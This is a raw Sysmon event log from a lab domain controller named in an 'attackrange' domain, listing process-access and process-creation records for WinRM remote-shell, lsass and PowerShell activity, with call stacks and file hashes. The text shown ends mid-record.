13:08:49.043{08A6967A-40E0-6000-1400-000000009901}13004092C:\Windows\system32\svchost.exe{08A6967A-4261-6000-E102-000000009901}4820C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.027{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4261-6000-E102-000000009901}4820C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-4261-6000-E202-000000009901}27884380C:\Windows\system32\conhost.exe{08A6967A-4261-6000-E102-000000009901}4820C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-4261-6000-E202-000000009901}2788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-4261-6000-E102-000000009901}4820C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4261-6000-E102-000000009901}4820C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.012{08A6967A-4261-6000-E102-000000009901}4820C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4260-6000-168F-110000000000}0x118f160HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-40DF-6000-0C00-000000009901}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.996{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.996{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.996{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.621{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.621{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.621{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.418{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-4262-6000-EC02-000000009901}4288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.418{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-4262-6000-EC02-000000009901}4288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.399{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 